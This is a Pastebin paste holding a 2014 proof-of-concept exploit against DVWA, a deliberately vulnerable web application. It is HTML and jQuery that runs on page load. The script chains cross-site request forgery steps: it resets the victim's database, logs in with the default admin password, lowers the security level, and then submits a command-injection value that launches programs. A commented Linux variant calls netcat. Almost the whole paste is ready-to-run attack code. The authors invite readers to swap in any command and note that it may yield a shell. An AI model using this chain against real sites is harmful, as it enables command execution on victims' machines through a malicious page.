Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
- first reset the DVWA database of victim, then make the victim log in using the default resets,
- next crafts another CSRF to change the challenge level to low to make exploitation more probable,
- then use these to craft a command execution CSRF and possibly get a shell. :)
- *This PoC will open calculator as a demo execution in approximately 5 seconds.*
- The attacker just needs to know you have DVWA for this to work.
- Paulos Yibelo and Tabor N. Shiferaw 2014
- -->
- <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
- </script>
- <div id='loader'></div>
- <Script>
- //document.getElementById("loader").innerHTML = 'Loading...';
- var one = {"create_db":'whatever'};
- var two = {"username":"admin","password":"password","Login":"Login"};
- var three = {"security":"low","seclev_submit":"Submit"};
- //windows opens calculator; change this to whatever your desire
- var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};
- //linux
- //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
- /*
- *step 1
- *Reset the Databse
- */
- function start_exploit()
- {
- $("#loader").html("Loading...");
- $.ajax({
- url:"http://localhost/dvwa/setup.php",
- type:"POST",
- data:one,
- success:
- function(x){
- dvwaLogin();
- }
- });
- }
- /*
- *step 2
- *login using default new password
- */
- function dvwaLogin()
- {
- $.ajax({
- url:"http://localhost/dvwa/login.php",
- type:"POST",
- data:two,
- success:function(x){
- levelChanger();
- }
- });
- }
- /*
- *step 3
- *set level to low
- */
- function levelChanger(){
- $.ajax({
- url:"http://localhost/dvwa/security.php",
- type:"POST",
- data:three,
- success:function(x){
- commandExecution();
- }
- });
- }
- /*
- *step 4
- *execute command
- */
- function commandExecution(){
- $.ajax(
- {
- url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
- type:"POST",
- data:four,
- success:function(x){
- //document.getElementById("loader").innerHTML = "Executed";
- $("#loader").text("Loaded");
- }
- }
- );
- }
- start_exploit();
- </script>
- <!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement